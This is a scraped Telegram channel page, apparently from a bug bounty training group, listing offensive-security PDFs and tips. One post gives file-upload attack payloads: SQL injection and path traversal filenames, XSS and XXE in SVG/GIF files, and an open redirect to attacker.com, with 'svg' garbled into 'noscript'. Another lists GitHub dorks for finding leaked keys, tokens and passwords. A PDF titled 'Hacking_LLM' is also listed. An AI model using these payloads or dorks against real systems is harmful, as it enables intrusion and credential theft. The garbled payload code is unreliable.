Brut Security – Telegram
Brut Security
@brutsecurity
14.7K subscribers
910 photos
73 videos
287 files
967 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
About
Blog
Apps
Platform
Join
Brut Security
14.7K subscribers
Brut Security
Park_Foreman_Vulnerability_Management,_Auerbach_Publications_2019.pdf
5.6 MB
🔥2
2.79K viewsMr. Brut
Brut Security
How_Attacker_Abuse_VSCode_as_RAT.pdf
1016.4 KB
Long_Password_DOS_Attack.pdf
195.1 KB
👍3🔥1
2.9K viewsMr. Brut
Brut Security
S3 Bucket Recon Method
👍17🔥2
3.29K viewsMr. Brut
Brut Security
JWT_Hacking.pdf
226.3 KB
🔥4
3.05K viewsMr. Brut
Brut Security
Attacking_AWS.pdf
1.6 MB
🔥4
3.28K viewsMr. Brut
Brut Security
Now you can detect phishing websites quickly with Nuclei

nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
3🔥3👍1
3.21K viewsMr. Brut
Brut Security
Pwning_the_Domain_DACL_Abuse_EBook.pdf
3.6 MB
3👍1🔥1
2.9K viewsMr. Brut
Brut Security
🔥8
2.61K viewsMr. Brut
Brut Security
🖥Chaining Vulnerabilities through File Upload🖥

SLQi
'sleep(20).jpg
sleep(25)-- -.jpg


Path traversal
../../etc/passwd/logo.png
../../../logo.png


XSS
->  Set file name filename="noscript onload=alert(document.domain)>" , filename="58832_300x300.jpg<noscript onload=confirm()>"

->  Upload using .gif file
GIF89a/<noscript/onload=alert(1)>/=alert(document.domain)//;

-> Upload using .noscript file
<noscript xmlns="w3.org/2000/noscript" onload="alert(1)"/>

-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE noscript PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1…"><noscript version="1.1" baseProfile="full" xmlns="w3.org/2000/noscript">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <noscript type="text/javanoscript">
      alert("HolyBugx XSS");
   </noscript>
</noscript>


Open redirect 
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<noscript
onload="window.location='attacker.com'"
xmlns="w3.org/2000/noscript">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</noscript>
</code>

XXE 
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<noscript width="500px" height="500px" xmlns="w3.org/2000/noscript" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</noscript>
Please open Telegram to view this post
VIEW IN TELEGRAM
13👍6🔥1
3.14K viewsMr. Brut, edited  
Brut Security
Blind SQL Injection Detection and Exploitation (Cheat Sheet)
👎4🔥2😁1
2.98K viewsMr. Brut
Brut Security
1711031051425.jpg
1.4 MB
🔥41
2.99K viewsMr. Brut
Brut Security
2FA Bypass Techniques

1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
🔥12👍5
3.01K viewsMr. Brut
Brut Security
SQL injection Oneliner
🔥12👍4
2.88K viewsMr. Brut
Brut Security
🔥🔥Github-Dork🚀🚀🔥🔥

Happy Hunting

🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials

#bugbountytips #GitHub
🔥6👍4
3.23K viewsMr. Brut
Brut Security
🔥5👍1
2.61K viewsMr. Brut
Brut Security
SQL Injection Auth Bypass
🔥6👍4🥰1👏1
3.14K viewsMr. Brut
Brut Security
Deep Dive into Networking.pdf
9.3 MB
🔥4👍2
3.12K viewsMr. Brut
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
2
2.68K viewsMr. Brut
Brut Security
Public Bug Bounty Programs [Domain,Subdomain]
https://github.com/trickest/inventory

Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/

Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports

Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty

Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD

Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
http://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en
GitHub
GitHub - trickest/inventory: Asset inventory of over 800 public bug bounty programs.
Asset inventory of over 800 public bug bounty programs. - trickest/inventory
4🔥4👍1
3.52K viewsMr. Brut
Brut Security
Hacking_LLM.pdf
2.8 MB
3.37K viewsMr. Brut